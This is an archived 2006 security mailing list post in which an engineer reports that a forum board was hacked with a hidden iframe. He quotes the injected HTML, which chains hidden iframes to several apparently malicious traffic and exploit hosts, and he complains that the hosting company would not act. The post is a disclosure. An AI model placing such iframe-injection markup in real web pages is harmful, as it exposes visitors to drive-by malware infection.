lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <OFC9C56928.6E31745F-ON85257145.0055E0D9-85257145.0055EC1A@metafore.ca>
Date: Mon Apr  3 16:38:39 2006
From: psmith at metafore.ca (psmith@...afore.ca)
Subject: Invisionzone.com board hacked...and Invision
	won't do a thing...


What is with irresponsible hosting companies?

I called Invision to report a hack where someone planted an iframe, which
is loading some exploits (wmf files and such). They will NOT do anything
unless the account holder calls in...so lets keep letting machines get
infected.

That is very irresponsible.

The site in question is http://september2002.invisionzone.com , (which is a
board my wife visits, other mothers with children born in September 2002)

Going there, you get:

<html>
<head>
<title>iframeCASH.biz</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<body>
<iframe src="http://www.doubleh.fr/audio/index.htm" width=1
height=1></iframe>
<b>IPB WARNING</b> [2] main(./sources/functions.php): failed to open
stream: No such file or directory (Line: 211 of /index.php)<br />
<b>IPB WARNING</b> [2] main(./sources/functions.php): failed to open
stream: No such file or directory (Line: 211 of /index.php)<br />

Of course, the index.htm at doubleh.fr , has the following content:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<iframe src="http://traffdollars.biz/dl/adv553.php" width=1
height=1></iframe>
<iframe src="http://1-extreme.biz/traff.php?adv=35" width=1
height=1></iframe>
<iframe src='http://traff4all.biz/adv/174/new.php' width=1
height=1></iframe>
<iframe src="http://85.255.113.22/inc/nan49.html" width=1
height=1></iframe>
</body>
</html>

I didn't go beyond this, as I am ticked off from spending the last half an
hour trying to clean up after it.

However, Invision sure should have at least taken the URL to look at it.

Are all hosting companies like this? Very stupid.

I am not sure what it was trying to do, but it affected both Firefox and
MSIE. I have installed the latest SAV (04-02-2006) definitions and it
didn't say very much.

Thanks,

Paul

---------------------------------------------------
Paul W. Smith
Senior Network Operations Engineer
MCP, SCWSE, SCSA, SCNA, ACE, 3CSA, CNS, CLS, CLA, CRA, BCCA, JNCIA-FWV
Enterprise Services
Metafore IT Solutions
Direct: 905.362.7290
Cell: 416.271.6937
Toll Free: 800.563.7515 x 4086
psmith@...afore.ca
http://www.metafore.ca

M E T A F O R E
IT SOLUTIONS
----------------------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ